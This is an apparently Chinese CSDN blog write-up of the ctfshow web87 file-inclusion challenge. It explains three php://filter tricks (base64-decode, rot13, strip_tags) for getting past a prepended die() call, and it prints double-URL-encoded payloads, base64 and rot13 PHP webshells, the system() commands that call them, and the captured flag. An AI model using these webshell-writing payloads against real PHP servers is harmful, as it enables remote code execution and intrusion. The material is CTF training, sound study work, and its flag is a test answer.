ctfshow-web入门-文件包含(web87)巧用 php://filter 流绕过死亡函数的三种方法

已于 2024-07-06 12:42:17 修改
阅读量1k 收藏 29
点赞数 35
分类专栏: 文件包含 ctfshow web 文章标签: 学习 安全 php web安全 web xml
于 2024-07-06 12:41:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/140224831
版权
web 同时被 3 个专栏收录
158 篇文章 19 订阅
订阅专栏
ctfshow
59 篇文章 1 订阅
订阅专栏
文件包含
4 篇文章 0 订阅
订阅专栏

目录

方法1:php://filter 流的 base64-decode 方法

方法2:通过 rot13 编码实现绕过

方法3:通过 strip_tags 函数去除 XML 标签

除了替换,新增 file_put_contents 函数,将会往 $file 里写入 <?php die('大佬别秀了');?> 和我们 post 传入的 $content 内容。

由于 $content 参数可控,因此我们可以写入恶意的 php 代码或者一句话木马,但是 <?php die('大佬别秀了');?> 这段 PHP 代码它会立即终止脚本执行并输出消息 "大佬别秀了",因此我们还需要绕过这个 die() 函数。

方法1:php://filter 流的 base64-decode 方法

Base64 编码仅包含 64 个可打印字符,即 A-Z、a-z、0-9、+ 和 /。在 PHP 中,当使用 base64_decode 函数解码一个字符串时,如果字符串中包含不在 Base64 字符集中的字符,这些字符将被跳过,只解码合法的 Base64 字符。

在解码 Base64 字符串之前先移除所有非法字符示例:

<?php
// 从 GET 请求中获取 'txt' 参数,并移除所有非法字符
$_GET['txt'] = preg_replace('|[^a-z0-9A-Z+/]|s', '', $_GET['txt']);

// 解码清理后的 Base64 字符串
$decoded = base64_decode($_GET['txt']);

// 输出解码后的字符串
echo $decoded;

题目中 $content 被加上了 <?php die('大佬别秀了');?> ,我们可以使用 php://filter/write=convert.base64-decode 先对其进行解码,在解码过程中,字符 <、?、空格、(、'、)、;、>,这些字符不符合 base64 编码的字符范围都将先被移除,最终剩下的用于解码的字符只有 phpdie 和我们 post 传入的内容。

由于 Base64 解码是以 4 个字符为一组进行的,这里移除后只剩下 6 个字符,因此我们随便加两个合法字符补全,让其 base64 解码成功,后面再继续传入经过 base64 编码的 payload,也可以被正常解码。

这里 url 传入的内容本身会进行一次 url 解码,题目中还使用了一个 urldecode 函数,因此 file 传入的内容需要先经过两次 url 编码再传入。

file 传入 php://filter/write=convert.base64-decode/resource=shell.php

进行两次 url 编码:

我在网上找了一些在线网站或者使用 urlencode() 函数都不会对字母进行 url 编码

因此这里使用 hackbar 来编码的,或者使用 burpsuite 也可以

我们不难看出,url 编码其实就是字符的十六进制前面加了个百分号 

两次 url 编码后的 payload: 

?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%37%30%25%36%38%25%37%30

对 webshell 进行 base64 编码:

注意我们还需要加两个合法字符让前面 base64 解码成功,这里多传入两个1。

post 传入:

content=11PD9waHAgQGV2YWwoJF9HRVRbJ2NtZCddKTs/Pg==

调用 shell.php

/shell.php?cmd=system('ls');

读取 flag:

/shell.php?cmd=system('tac fl0g.php');

拿到 flag:ctfshow{c7a95f32-b6d9-4a59-b8e7-c385684ce860}

方法2:通过 rot13 编码实现绕过

<?php die('大佬别秀了');?> 经过 rot13 编码会变成 <?cuc qrv(); ?>,如果 php 未开启短标签,则不会认识这段代码,也就不会执行。

file 传入 php://filter/write=string.rot13/resource=sh.php

两次 url 编码:

?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%32%25%36%66%25%37%34%25%33%31%25%33%33%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%37%33%25%36%38%25%32%65%25%37%30%25%36%38%25%37%30

将一句话木马进行 rot13 解码后传入 

content=<?cuc @riny($_TRG['pzq']);?>

该内容经过 rot13 编码就会变回正常的一句话木马 

之后访问 sh.php,调用木马:

/sh.php?cmd=system('ls');

该方法也是可以读取到 flag 的:

/sh.php?cmd=system('tac fl0g.php');

我们可以来看一下 sh.php 的内容:

前面短标签的 php 代码 <?cuc qvr('大佬别秀了');?> 无法被识别,但是后面的 <?php @eval($_GET['cmd']);?> 可以正常执行,总的来说这种方法适用于未开启短标签的情况。

方法3:通过 strip_tags 函数去除 XML 标签

<?php die(); ?> 实际上就是一个 XML 标签,我们可以通过 strip_tags 函数去除它。

但是我们传入的一句话木马也是 XML 标签,如何让它只去除 <?php die(); ?> 而不破坏我们传入的木马呢?我们可以先对一句话木马进行 base64 编码后传入,这样就不会受到 strip_tags 函数的影响,当去除掉 <?php die(); ?> 后,由于 php://filter 允许使用多个过滤器,我们再调用 base64-decode 将一句话木马进行 base64 解码,实现还原。

post 传入 base64 编码的一句话木马:

content=PD9waHAgQGV2YWwoJF9HRVRbJ2NtZCddKTs/Pg==

file 传入 php://filter/read=string.strip_tags|convert.base64-decode/resource=hack.php

两次 url 编码:

?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%32%25%36%35%25%36%31%25%36%34%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%33%25%37%34%25%37%32%25%36%39%25%37%30%25%35%66%25%37%34%25%36%31%25%36%37%25%37%33%25%37%63%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%36%31%25%32%65%25%37%30%25%36%38%25%37%30

报错:

Deprecated: file_put_contents(): The string.strip_tags filter is deprecated in /var/www/html/index.php on line 21

当前的 PHP 版本中 string.strip_tags 过滤器已被弃用 

看了下 hack.php 的内容:

是 base64 编码的一句话木马,很奇怪,我原本以为第一个过滤器执行失败了,但是这里没有看到 <?php die(); ?> ,说明 string.strip_tags 过滤器执行成功了,但 convert.base64-decode 过滤器未成功执行。

不太清楚是什么原因,知道的师傅可以解释一下谢谢。

Myon⁶
关注
  • 35
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFshow 文件包含 web87
Kradress的博客
12-12 1880
目录源码思路题解题解一题解二总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 21:57:55 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])
ctfshow文件包含
SopRomeo的博客
12-17 1127
web80-81 web80 过滤了data协议,php 这题新思路,伪造UA写入php代码,然后包含日志文件来进行getshell, 当然这题还可以用大小写绕,因为str_replace区分大小写 ?file=/var/log/nginx/access.log 查flag即可 web81 web82-86 过滤了.不能通过文件包含来进行绕过 利用session.upload_progress进行文件包含 不多说了,WMCTF也做过 import io import sys import req
ctfshow-文件包含
m0_74456293的博客
03-27 536
ctfshow-文件包含
ctfshow web入门 web87
最新发布
2401_83272517的博客
05-25 962
入门2年半还没有入门的菜坤的日常wp
ctfshow文件包含web87-117
m0_62207170的博客
06-19 455
ctfshow文件包含web87-117
文件包含(ctfshow web入门
qq_47168481的博客
11-17 3360
web79 本题考察php伪协议中的其他方法,对php进行了过滤 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); } 可以采用data伪协议 file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg== 后面的base64
CTFshow web入门web87-文件包含10
weixin_74336671的博客
12-01 269
把data协议也ban了,换一种方式,不直接通过当前页面进行内容的传递,使用日志包含。通过wappalyzer查看网页的banner信息,发现是nginx服务器。本题的路径是/var/log/nginx/access.log.通过抓包在UA头中插入payload,文件包含日志使代码执行。通过file读取日志,发现内容为请求行、UA头、IP地址。
浅谈php://filter的妙用
10-17
无论是用于防止XXE漏洞,还是用于绕过某些限制,`php://filter`都能发挥其独特的功能,为我们的代码提供更多的可能性。理解并掌握这一协议的用法,对于提升PHP开发的安全性和灵活性都具有重要意义。
Web后端开发-使用Filter过滤器技术,实现访问量统计-方法二使用web.xml配置的方式
04-11
本篇文章将详细讲解如何通过使用`web.xml`配置文件来实现Filter过滤器,以实现对网站访问量的统计。这种方法是Java Web应用中的经典实践,适用于传统的基于Servlet的项目。 首先,我们需要了解Filter的基本概念。...
webjars-webfilter-resolver:Webfilter可以自动解决webjar的问题,而无需使用类似于Spring Boot的版本
05-17
Webjars自动将webjar依赖项放到类路径上,该类路径允许通过简单地包含诸如webjars/bootstrap/4.1.0/css/bootstrap.min.css之类的文件来引用资产文件。 但是,您必须包括该版本(上一代码段中为4.1.0 )。 对于...
spring-web-5.3.6 jar包.rar
07-26
这个jar文件包含Web应用开发时,用到Spring框架时所需的核心类, 包括自动载入WebApplicationContext特性的类、Struts与JSF集成类、文件上传的支持类、Filter类和大量工具辅助类。 spring的核心类,提供了核心HTTP...
2021-05-28-WebAPI高级应用三--过滤器Filter.rar
12-28
1. "WebAPI高级应用三--过滤器Filter.md" 这个Markdown文件很可能包含了关于Web API过滤器的详细教程,包括定义、分类、使用场景、如何创建自定义过滤器以及如何在Web API配置中应用它们。 2. "YDT.Project....
ctfshow学习记录-web入门文件包含78-87
龟速更新的九某人
07-04 1642
ctfshow学习记录-web入门文件包含web78-87
ctfshow web入门 web87--web88&&web116--web117
2301_81040377的博客
04-04 735
content是写入内容,要进行base64编码 ,而base解码时,是4个一组,flag.php(要写入的文件),写入的内容<?整个函数调用的作用是将解码后的 $file 作为目标文件路径,然后将前面定义的终止执行提示语句与 $content 的内容拼接起来,一起写入到目标文件中。两次URL编码(浏览器(hackbar)一次,题目绕过一次)为。用php伪协议绕过但是常见的编码都被过滤这里有一种新的编码。php伪协议进行绕过(但是编码的时候必须绕过=和+)(工具用的bp的编码器,这个编码器我找了好久好久)
ctfshow web入门文件包含
qq_53263789的博客
07-19 667
ctfshow
ctfshow_web入门_文件包含_web78~web117
qq_62989306的博客
09-13 755
文件包含php://filter伪协议、data协议、包含日志文件、session.upload_progress利用、条件竞争、死亡绕过……
ctfshow web入门 78-88的文件包含
Firebasky的博客
09-18 4177
1. web78 PHP伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php 2. web79 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); 然后查看源代码 3. web80-
CTFshow_Web_文件包含——web78~88、116~117
Ho1aAs‘s Blog
04-26 1037
文章目录题解web78web79web80~81web82~86web87web88web116web117完 题解 LFI:Local File Include RFI:Remote File Include web78 php伪协议,使用php://filter,解码即可 [GET]PAYLOAD: ?file=php://filter/convert.base64-encode/resource=flag.php web79 过滤php,data伪协议,使用php://data,上传php代码打开f
CTFshow_web入门_文件包含(web78~web88)
monster663的博客
02-02 983
web78 直接包含,如果不知道就去学习一下什么是文件包含 ?file=php://filter/read=convert.base64-encode/resource=flag.php web79 if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__);
php://filter/read=convert.base64-encode/resource=使用场景
08-29
引用和提到了使用php://filter/read=convert.base64-encode/resource=来访问数据并将其转换为base64编码。这个功能可以在一些特殊场景下使用,比如在文件包含漏洞或路径遍历漏洞中,通过构造恶意的URL参数来读取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Myon⁶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值